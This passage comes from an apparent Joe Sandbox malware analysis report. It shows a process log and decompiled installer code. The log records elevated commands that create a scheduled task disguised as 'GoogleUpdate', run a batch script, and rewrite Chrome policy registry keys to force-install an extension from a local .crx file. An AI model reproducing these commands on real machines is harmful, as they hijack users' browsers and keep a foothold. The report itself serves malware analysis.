                                                                        Wow64 process (32bit):false
                                                                        Commandline:schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
                                                                        Imagebase:0x7ff6b71a0000
                                                                        File size:226816 bytes
                                                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:38
                                                                        Start time:15:35:43
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
                                                                        Imagebase:0x7ff7cb270000
                                                                        File size:273920 bytes
                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:39
                                                                        Start time:15:35:43
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6da640000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:40
                                                                        Start time:15:35:43
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:41
                                                                        Start time:15:35:43
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:42
                                                                        Start time:15:35:44
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:43
                                                                        Start time:15:35:44
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d dbffglanhdhedkjkijpkplhpcdndpchj /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:44
                                                                        Start time:15:35:45
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\WindowsApp\apps-helper\apps.crx" /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:45
                                                                        Start time:15:35:45
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "version" /t REG_SZ /d 1.0 /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 0001508D Relevance: 45.8, APIs: 5, Strings: 21, Instructions: 322COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 918 1508d-1513b call 3f670 * 2 GetModuleHandleW call 503f0 call 505a2 call 11209 929 15151-15162 call 141d2 918->929 930 1513d 918->930 936 15164-15169 929->936 937 1516b-15187 call 15525 CoInitializeEx 929->937 931 15142-1514c call 5012f 930->931 938 153cc-153d3 931->938 936->931 946 15190-1519c call 4fbad 937->946 947 15189-1518e 937->947 940 153e0-153e2 938->940 941 153d5-153db call 554ef 938->941 944 153e4-153eb 940->944 945 15407-15425 call 1d723 call 2a6d0 call 2a91e 940->945 941->940 944->945 948 153ed-15402 call 5041b 944->948 967 15453-15466 call 14e9c 945->967 968 15427-1542f 945->968 955 151b0-151bf call 50cd1 946->955 956 1519e 946->956 947->931 948->945 964 151c1-151c6 955->964 965 151c8-151d7 call 529b3 955->965 959 151a3-151ab call 5012f 956->959 959->938 964->959 975 151e0-151ef call 5343b 965->975 976 151d9-151de 965->976 978 15468 call 53911 967->978 979 1546d-15474 967->979 968->967 970 15431-15434 968->970 970->967 973 15436-15451 call 2416a call 1550f 970->973 973->967 989 151f1-151f6 975->989 990 151f8-15217 GetVersionExW 975->990 976->959 978->979 984 15476 call 52dd0 979->984 985 1547b-15482 979->985 984->985 986 15484 call 51317 985->986 987 15489-15490 985->987 986->987 993 15492 call 4fcbc 987->993 994 15497-15499 987->994 989->959 996 15251-15296 call 133d7 call 1550f 990->996 997 15219-1524c call 137d3 990->997 993->994 1000 154a1-154a8 994->1000 1001 1549b CoUninitialize 994->1001 1017 152a9-152b9 call 27337 996->1017 1018 15298-152a3 call 554ef 996->1018 997->959 1004 154e3-154ec call 5000b 1000->1004 1005 154aa-154ac 1000->1005 1001->1000 1015 154f3-1550c call 506f5 call 3de36 1004->1015 1016 154ee call 144e9 1004->1016 1009 154b2-154b8 1005->1009 1010 154ae-154b0 1005->1010 1014 154ba-154d3 call 23c30 call 1550f 1009->1014 1010->1014 1014->1004 1033 154d5-154e2 call 1550f 1014->1033 1016->1015 1030 152c5-152ce 1017->1030 1031 152bb 1017->1031 1018->1017 1034 152d4-152d7 1030->1034 1035 15396-153a3 call 14c33 1030->1035 1031->1030 1033->1004 1038 152dd-152e0 1034->1038 1039 1536e-1538a call 149df 1034->1039 1045 153a8-153ac 1035->1045 1042 152e2-152e5 1038->1042 1043 15346-15362 call 147e9 1038->1043 1050 153b8-153ca 1039->1050 1055 1538c 1039->1055 1047 152e7-152ea 1042->1047 1048 1531e-1533a call 14982 1042->1048 1043->1050 1057 15364 1043->1057 1045->1050 1051 153ae 1045->1051 1053 152fb-1530e call 14b80 1047->1053 1054 152ec-152f1 1047->1054 1048->1050 1060 1533c 1048->1060 1050->938 1051->1050 1053->1050 1062 15314 1053->1062 1054->1053 1055->1035 1057->1039 1060->1043 1062->1048
                                                                          C-Code - Quality: 69%
                                                                          			E0001508D(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed short* _a20) {
				signed int _v8;
				signed short _v16;
				struct _OSVERSIONINFOW _v292;
				signed int _v296;
				intOrPtr _v304;
				signed short _v308;
				intOrPtr _v312;
				WCHAR* _v316;
				WCHAR* _v320;
				WCHAR* _v324;
				WCHAR* _v328;
				signed short* _v332;
				char _v340;
				char _v344;
				signed short _v420;
				intOrPtr _v576;
				intOrPtr _v1316;
				char _v1332;
				signed short _v1340;
				char _v1404;
				intOrPtr _v1532;
				intOrPtr _v1544;
				signed short _v1564;
				char _v1588;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				void* _t83;
				signed short _t85;
				signed short _t87;
				signed short _t88;
				signed short _t89;
				signed short _t90;
				signed short _t91;
				signed short _t93;
				signed short _t99;
				signed short _t101;
				signed short _t103;
				intOrPtr _t124;
				signed short _t131;
				signed short _t134;
				signed short _t137;
				signed short _t144;
				signed short _t148;
				void* _t149;
				void* _t156;
				signed short _t159;
				signed short _t162;
				signed short _t167;
				signed short _t170;
				signed int _t171;
				void* _t172;
				void* _t173;

				_t156 = __edx;
				_t149 = __ecx;
				_t70 =  *0x7a008; // 0xfbf51acb
				_v8 = _t70 ^ _t171;
				_t148 = 0;
				_t157 = _a8;
				_v304 = _a4;
				_v332 = _a20;
				_v312 = _a12;
				_v328 = 0;
				_v324 = 0;
				_v320 = 0;
				_v316 = 0;
				E0003F670(_a8,  &_v292, 0, 0x11c);
				_v296 = 0;
				_v308 = 0;
				E0003F670(_a8,  &_v1588, 0, 0x4e8);
				_t173 = _t172 + 0x18;
				E000503F0(GetModuleHandleW(0));
				E000505A2(3, 0);
				_t83 = E00011209(_t149, _a12,  &_v344,  &_v340); // executed
				if(_t83 >= 0) {
					_t85 = E000141D2(_t149, _t156, __eflags,  &_v1588, _t157); // executed
					_t162 = _t85;
					__eflags = _t162;
					if(_t162 >= 0) {
						_v1544 = _a16;
						_t87 = E00015525();
						__imp__CoInitializeEx(0, 0); // executed
						_t162 = _t87;
						__eflags = _t162;
						if(_t162 >= 0) {
							_t159 = 1;
							_t88 = E0004FBAD();
							__eflags = _t88;
							if(_t88 >= 0) {
								_v328 = 1;
								_t89 = E00050CD1();
								_t164 = _t89;
								__eflags = _t89;
								if(__eflags >= 0) {
									_v324 = 1;
									_t90 = E000529B3(_t149, _t156, _t164, __eflags); // executed
									__eflags = _t90;
									if(_t90 >= 0) {
										_v320 = 1;
										_t91 = E0005343B(_t90);
										__eflags = _t91;
										if(_t91 >= 0) {
											_v316 = 1;
											_v292.dwOSVersionInfoSize = 0x11c;
											_t93 = GetVersionExW( &_v292);
											__eflags = _t93;
											if(_t93 != 0) {
												E000133D7( &_v296, 0);
												_push(_v296);
												_push(_v16 & 0x0000ffff);
												_push(_v292.dwBuildNumber);
												_push(_v292.dwMinorVersion);
												_push(_v292.dwMajorVersion);
												E0001550F(2, 0x20000001, "3.10.4.4718");
												_t173 = _t173 + 0x20;
												__eflags = _v296;
												if(__eflags != 0) {
													E000554EF(_v296);
													_t36 =  &_v296;
													 *_t36 = _v296 & 0;
													__eflags =  *_t36;
												}
												_t99 = E00027337(_t156, __eflags,  &_v1588); // executed
												_t167 = _t99;
												__eflags = _t167;
												if(_t167 >= 0) {
													_t101 = _v420;
													__eflags = _t101;
													if(_t101 == 0) {
														_t103 = E00014C33(_t156, _v312,  &_v1588); // executed
														_t167 = _t103;
														__eflags = _t167;
														if(_t167 >= 0) {
															L38:
															_t150 = _v332;
															_t148 = _v1564;
															 *_v332 = _v1340;
															goto L39;
														}
														_push("Failed to run untrusted mode.");
														goto L9;
													}
													_t131 = _t101 - 1;
													__eflags = _t131;
													if(_t131 == 0) {
														_v308 = _t159;
														_t167 = E000149DF(_t149, _t156, _v304,  &_v1588);
														__eflags = _t167;
														if(_t167 >= 0) {
															goto L38;
														}
														_push("Failed to run per-user mode.");
														goto L9;
													}
													_t134 = _t131 - 1;
													__eflags = _t134;
													if(_t134 == 0) {
														_t167 = E000147E9(_t149, _t156, _v304, _v312,  &_v1588);
														__eflags = _t167;
														if(_t167 >= 0) {
															goto L38;
														}
														_push("Failed to run per-machine mode.");
														goto L9;
													}
													_t137 = _t134 - 1;
													__eflags = _t137;
													if(_t137 == 0) {
														_v308 = _t159;
														_t167 = E00014982(_t149, _t156, _v304,  &_v1588);
														__eflags = _t167;
														if(_t167 >= 0) {
															goto L38;
														}
														_push("Failed to run embedded mode.");
														goto L9;
													}
													__eflags = _t137 == 1;
													if(_t137 == 1) {
														_t167 = E00014B80(_t149,  &_v1332, _a16);
														__eflags = _t167;
														if(_t167 >= 0) {
															goto L38;
														}
														_push("Failed to run RunOnce mode.");
														goto L9;
													}
													_t167 = 0x8000ffff;
													_push("Invalid run mode.");
													goto L9;
												} else {
													_push("Failed to initialize core.");
													L9:
													E0005012F();
													_t150 = _t167;
													goto L39;
												}
											}
											_t144 = GetLastError();
											__eflags = _t144;
											_t170 =  <=  ? _t144 : _t144 & 0x0000ffff | 0x80070000;
											__eflags = _t170;
											_t167 =  >=  ? 0x80004005 : _t170;
											E000137D3(0x80004005, "engine.cpp", 0x95, _t167);
											_push("Failed to get OS info.");
											goto L9;
										}
										_push("Failed to initialize XML util.");
										goto L9;
									}
									_push("Failed to initialize Wiutil.");
									goto L9;
								}
								_push("Failed to initialize Regutil.");
								goto L9;
							}
							_push("Failed to initialize Cryputil.");
							goto L9;
						}
						_push("Failed to initialize COM.");
						goto L2;
					}
					_push("Failed to initialize engine state.");
					goto L2;
				} else {
					_push("Failed to parse command line.");
					L2:
					E0005012F();
					_t150 = _t162;
					_t159 = _t148;
					L39:
					if(_v296 != 0) {
						E000554EF(_v296);
					}
					if(_t167 < 0 && _v576 == 0) {
						E0005041B(_t150, _t156, _t159, 0, L"Setup", L"_Failed", L"txt", 0, 0, 0);
					}
					E0001D723( &_v1404);
					E0002A6D0(_t150, _t156, _v1316); // executed
					E0002A91E();
					if(_t148 != 0) {
						_t124 = _v1532;
						if(_t124 != 0 && _t124 != 6) {
							E0001550F(2, 0xa0000008, E0002416A(_t124));
							_t173 = _t173 + 0xc;
							_t167 = 0x80070bc2;
							_t148 = 0;
						}
					}
					E00014E9C(_t148, _t150, _t159,  &_v1588);
					if(_v316 != 0) {
						E00053911();
					}
					if(_v320 != 0) {
						E00052DD0();
					}
					if(_v324 != 0) {
						E00051317();
					}
					if(_v328 != 0) {
						E0004FCBC();
					}
					if(_t159 != 0) {
						__imp__CoUninitialize(); // executed
					}
					if(_v308 != 0) {
						if(_t167 >= 0) {
							_t159 =  *_v332;
						} else {
							_t159 = _t167;
						}
						_push(E00023C30(_t148));
						E0001550F(2, 0x20000007, _t159);
						if(_t148 != 0) {
							_push(0xa0000005);
							E0001550F();
							_t150 = 2;
						}
					}
					E0005000B(_t150, _t159, 0);
					_t193 = _t148;
					if(_t148 != 0) {
						E000144E9(_t156);
					}
					E000506F5(_t150, _t159, _t193, 0);
					return E0003DE36(_t148, _v8 ^ _t171, _t156, _t159, _t167);
				}
			}


























































                                                                          0x0001508d
                                                                          0x0001508d
                                                                          0x00015096
                                                                          0x0001509d
                                                                          0x000150a8
                                                                          0x000150ab
                                                                          0x000150ae
                                                                          0x000150bc
                                                                          0x000150ca
                                                                          0x000150d0
                                                                          0x000150d6
                                                                          0x000150dc
                                                                          0x000150e2
                                                                          0x000150e8
                                                                          0x000150f8
                                                                          0x00015100
                                                                          0x00015106
                                                                          0x0001510b
                                                                          0x00015116
                                                                          0x0001511e
                                                                          0x00015132
                                                                          0x0001513b
                                                                          0x00015159
                                                                          0x0001515e
                                                                          0x00015160
                                                                          0x00015162
                                                                          0x0001516e
                                                                          0x00015174
                                                                          0x0001517d
                                                                          0x00015183
                                                                          0x00015185
                                                                          0x00015187
                                                                          0x00015192
                                                                          0x00015193
                                                                          0x0001519a
                                                                          0x0001519c
                                                                          0x000151b0
                                                                          0x000151b6
                                                                          0x000151bb
                                                                          0x000151bd
                                                                          0x000151bf
                                                                          0x000151c8
                                                                          0x000151ce
                                                                          0x000151d5
                                                                          0x000151d7
                                                                          0x000151e0
                                                                          0x000151e6
                                                                          0x000151ed
                                                                          0x000151ef
                                                                          0x000151fe
                                                                          0x00015205
                                                                          0x0001520f
                                                                          0x00015215
                                                                          0x00015217
                                                                          0x0001525a
                                                                          0x0001525f
                                                                          0x00015269
                                                                          0x0001526a
                                                                          0x00015270
                                                                          0x00015276
                                                                          0x00015288
                                                                          0x0001528d
                                                                          0x00015290
                                                                          0x00015296
                                                                          0x0001529e
                                                                          0x000152a3
                                                                          0x000152a3
                                                                          0x000152a3
                                                                          0x000152a3
                                                                          0x000152b0
                                                                          0x000152b5
                                                                          0x000152b7
                                                                          0x000152b9
                                                                          0x000152cb
                                                                          0x000152cb
                                                                          0x000152ce
                                                                          0x000153a3
                                                                          0x000153a8
                                                                          0x000153aa
                                                                          0x000153ac
                                                                          0x000153b8
                                                                          0x000153b8
                                                                          0x000153c4
                                                                          0x000153ca
                                                                          0x00000000
                                                                          0x000153ca
                                                                          0x000153ae
                                                                          0x00000000
                                                                          0x000153ae
                                                                          0x000152d4
                                                                          0x000152d4
                                                                          0x000152d7
                                                                          0x00015374
                                                                          0x00015386
                                                                          0x00015388
                                                                          0x0001538a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001538c
                                                                          0x00000000
                                                                          0x0001538c
                                                                          0x000152dd
                                                                          0x000152dd
                                                                          0x000152e0
                                                                          0x0001535e
                                                                          0x00015360
                                                                          0x00015362
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00015364
                                                                          0x00000000
                                                                          0x00015364
                                                                          0x000152e2
                                                                          0x000152e2
                                                                          0x000152e5
                                                                          0x00015324
                                                                          0x00015336
                                                                          0x00015338
                                                                          0x0001533a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001533c
                                                                          0x00000000
                                                                          0x0001533c
                                                                          0x000152e7
                                                                          0x000152ea
                                                                          0x0001530a
                                                                          0x0001530c
                                                                          0x0001530e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00015314
                                                                          0x00000000
                                                                          0x00015314
                                                                          0x000152ec
                                                                          0x000152f1
                                                                          0x00000000
                                                                          0x000152bb
                                                                          0x000152bb
                                                                          0x000151a3
                                                                          0x000151a4
                                                                          0x000151aa
                                                                          0x00000000
                                                                          0x000151aa
                                                                          0x000152b9
                                                                          0x00015219
                                                                          0x00015228
                                                                          0x0001522a
                                                                          0x00015232
                                                                          0x00015234
                                                                          0x00015242
                                                                          0x00015247
                                                                          0x00000000
                                                                          0x00015247
                                                                          0x000151f1
                                                                          0x00000000
                                                                          0x000151f1
                                                                          0x000151d9
                                                                          0x00000000
                                                                          0x000151d9
                                                                          0x000151c1
                                                                          0x00000000
                                                                          0x000151c1
                                                                          0x0001519e
                                                                          0x00000000
                                                                          0x0001519e
                                                                          0x00015189
                                                                          0x00000000
                                                                          0x00015189
                                                                          0x00015164
                                                                          0x00000000
                                                                          0x0001513d
                                                                          0x0001513d
                                                                          0x00015142
                                                                          0x00015143
                                                                          0x00015149
                                                                          0x0001514a
                                                                          0x000153cc
                                                                          0x000153d3
                                                                          0x000153db
                                                                          0x000153db
                                                                          0x000153e2
                                                                          0x00015402
                                                                          0x00015402
                                                                          0x0001540e
                                                                          0x00015419
                                                                          0x0001541e
                                                                          0x00015425
                                                                          0x00015427
                                                                          0x0001542f
                                                                          0x00015444
                                                                          0x00015449
                                                                          0x0001544c
                                                                          0x00015451
                                                                          0x00015451
                                                                          0x0001542f
                                                                          0x0001545a
                                                                          0x00015466
                                                                          0x00015468
                                                                          0x00015468
                                                                          0x00015474
                                                                          0x00015476
                                                                          0x00015476
                                                                          0x00015482
                                                                          0x00015484
                                                                          0x00015484
                                                                          0x00015490
                                                                          0x00015492
                                                                          0x00015492
                                                                          0x00015499
                                                                          0x0001549b
                                                                          0x0001549b
                                                                          0x000154a8
                                                                          0x000154ac
                                                                          0x000154b8
                                                                          0x000154ae
                                                                          0x000154ae
                                                                          0x000154ae
                                                                          0x000154c0
                                                                          0x000154c9
                                                                          0x000154d3
                                                                          0x000154d5
                                                                          0x000154dc
                                                                          0x000154e2
                                                                          0x000154e2
                                                                          0x000154d3
                                                                          0x000154e5
                                                                          0x000154ea
                                                                          0x000154ec
                                                                          0x000154ee
                                                                          0x000154ee
                                                                          0x000154f5
                                                                          0x0001550c
                                                                          0x0001550c

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 0001510F
                                                                            • Part of subcall function 000503F0: InitializeCriticalSection.KERNEL32(0007B60C,?,0001511B,00000000,?,?,?,?,?,?), ref: 00050407
                                                                            • Part of subcall function 00011209: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00015137,00000000,?), ref: 00011247
                                                                            • Part of subcall function 00011209: GetLastError.KERNEL32(?,?,?,00015137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00011251
                                                                          • CoInitializeEx.OLE32(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 0001517D
                                                                            • Part of subcall function 00050CD1: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00050CF2
                                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 0001520F
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00015219
                                                                          • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0001549B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                          • String ID: 3.10.4.4718$@Met$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize user state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$Setup$_Failed$user.cpp$txt
                                                                          • API String ID: 3262001429-1227006524
                                                                          • Opcode ID: 3c4ec6ff5e20f80670d5d3ef9eb1ac02f49351219ce6031b33d4c9db391ee980
                                                                          • Instruction ID: cc0bfe75ce8175ee4193fc7dd97eb9a3606f6449d355bb99708d2ec219ff3723
                                                                          • Opcode Fuzzy Hash: 3c4ec6ff5e20f80670d5d3ef9eb1ac02f49351219ce6031b33d4c9db391ee980
                                                                          • Instruction Fuzzy Hash: 64B1A671D41A29EBDB32AB64CC46BEE76A8AF84313F040095FD09BB251D7719EC48E91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00013BC3 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 311fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1063 13bc3-13c50 call 3f670 * 2 GetFileAttributesW 1068 13c52-13c6d GetLastError 1063->1068 1069 13c84-13c87 1063->1069 1068->1069 1070 13c6f-13c70 1068->1070 1071 13fd3 1069->1071 1072 13c8d-13c90 1069->1072 1073 13c75-13c7f call 137d3 1070->1073 1074 13fd8-13fe1 1071->1074 1075 13c92-13ca5 SetFileAttributesW 1072->1075 1076 13cc9-13cd0 1072->1076 1079 13fea-13ff1 1073->1079 1078 13fe3-13fe4 FindClose 1074->1078 1074->1079 1075->1076 1080 13ca7-13cc7 GetLastError 1075->1080 1081 13cd2-13cd9 1076->1081 1082 13cdf-13ce7 1076->1082 1078->1079 1087 13ff3-13ff9 call 554ef 1079->1087 1088 13ffe-14010 call 3de36 1079->1088 1080->1073 1081->1082 1083 13f57 1081->1083 1084 13d24-13d3f call 12d79 1082->1084 1085 13ce9-13cfd GetTempPathW 1082->1085 1093 13f5d-13f6b RemoveDirectoryW 1083->1093 1084->1079 1099 13d45-13d61 FindFirstFileW 1084->1099 1085->1084 1089 13cff-13d1f GetLastError 1085->1089 1087->1088 1089->1073 1093->1074 1096 13f6d-13f83 GetLastError 1093->1096 1097 13f85-13f87 1096->1097 1098 13f9f-13fa1 1096->1098 1100 13fa3-13fa9 1097->1100 1101 13f89-13f9b MoveFileExW 1097->1101 1098->1074 1098->1100 1102 13d63-13d7e GetLastError 1099->1102 1103 13d88-13d92 1099->1103 1105 13ef9-13f03 call 137d3 1100->1105 1101->1100 1104 13f9d 1101->1104 1102->1103 1106 13d94-13d9d 1103->1106 1107 13db9-13ddf call 12d79 1103->1107 1104->1098 1105->1074 1109 13da3-13daa 1106->1109 1110 13ebc-13ecc FindNextFileW 1106->1110 1107->1074 1117 13de5-13df2 1107->1117 1109->1107 1115 13dac-13db3 1109->1115 1112 13f4c-13f51 GetLastError 1110->1112 1113 13ece-13ed4 1110->1113 1118 13f53-13f55 1112->1118 1119 13fae-13fce GetLastError 1112->1119 1113->1103 1115->1107 1115->1110 1120 13e21-13e28 1117->1120 1121 13df4-13df6 1117->1121 1118->1093 1119->1105 1123 13eb6 1120->1123 1124 13e2e-13e30 1120->1124 1121->1120 1122 13df8-13e08 call 12b2e 1121->1122 1122->1074 1131 13e0e-13e17 call 13bc3 1122->1131 1123->1110 1126 13e32-13e45 SetFileAttributesW 1124->1126 1127 13e4b-13e59 DeleteFileW 1124->1127 1126->1127 1129 13ed9-13ef4 GetLastError 1126->1129 1127->1123 1130 13e5b-13e5d 1127->1130 1129->1105 1132 13e63-13e80 GetTempFileNameW 1130->1132 1133 13f2a-13f4a GetLastError 1130->1133 1137 13e1c 1131->1137 1135 13e86-13ea3 MoveFileExW 1132->1135 1136 13f08-13f28 GetLastError 1132->1136 1133->1105 1138 13ea5-13eac 1135->1138 1139 13eae 1135->1139 1136->1105 1137->1123 1140 13eb4 MoveFileExW 1138->1140 1139->1140 1140->1123
                                                                          C-Code - Quality: 75%
                                                                          			E00013BC3(void* __edx, WCHAR* _a4, unsigned int _a8) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1078;
				intOrPtr _v1592;
				intOrPtr _v1594;
				struct _WIN32_FIND_DATAW _v1640;
				signed int _v1644;
				signed int _v1648;
				WCHAR* _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t66;
				signed char _t80;
				void* _t81;
				short _t87;
				void* _t89;
				short _t93;
				signed char _t94;
				int _t95;
				signed short _t97;
				int _t100;
				int _t101;
				signed short _t102;
				signed short _t106;
				int _t108;
				signed short _t112;
				short _t114;
				signed short _t116;
				signed short _t121;
				signed short _t123;
				long _t124;
				WCHAR* _t125;
				signed char _t126;
				void* _t130;
				void* _t132;
				signed int _t160;

				_t130 = __edx;
				_t66 =  *0x7a008; // 0xfbf51acb
				_v8 = _t66 ^ _t160;
				_v1648 = _v1648 | 0xffffffff;
				_v1660 = _a8 & 0x00000001;
				_t125 = _a4;
				_v1656 = _a8 >> 0x00000001 & 0x00000001;
				_v1652 = _t125;
				_t133 = 0;
				_v1664 = _a8 >> 0x00000002 & 0x00000001;
				_v1644 = _v1644 & 0;
				E0003F670(0x208,  &_v1048, 0, 0x208);
				E0003F670(0x208,  &_v528, 0, 0x208);
				_t80 = GetFileAttributesW(_t125); // executed
				_t132 = GetLastError;
				_t126 = _t80;
				if(_t126 != 0xffffffff) {
					L4:
					if((_t126 & 0x00000010) == 0) {
						_t133 = 0x8000ffff;
						L54:
						_t81 = _v1648;
						if(_t81 != 0xffffffff) {
							FindClose(_t81);
						}
						L56:
						if(_v1644 != 0) {
							E000554EF(_v1644);
						}
						return E0003DE36(_t126, _v8 ^ _t160, _t130, _t132, _t133);
					}
					if((_t126 & 0x00000001) == 0 || SetFileAttributesW(_v1652, 0x80) != 0) {
						if(_v1660 != 0 || _v1656 != 0) {
							_t126 = _v1664;
							if(_t126 == 0 || GetTempPathW(0x104,  &_v1048) != 0) {
								_t87 = E00012D79(_t127, _v1652, L"*.*",  &_v1644);
								_t133 = _t87;
								if(_t87 < 0) {
									goto L56;
								}
								_t89 = FindFirstFileW(_v1644,  &_v1640); // executed
								_v1648 = _t89;
								if(_t89 != 0xffffffff) {
									while(1) {
										_t130 = 0x2e;
										if(_t130 != _v1640.cFileName) {
											goto L20;
										}
										_t127 = 0;
										if(0 == _v1594 || _t130 == _v1594 && 0 == _v1592) {
											L36:
											_t127 =  &_v1640;
											_t95 = FindNextFileW(_t89,  &_v1640); // executed
											if(_t95 == 0) {
												if(GetLastError() != 0x12) {
													_t97 = GetLastError();
													_t136 =  <=  ? _t97 : _t97 & 0x0000ffff | 0x80070000;
													_t98 = 0x80004005;
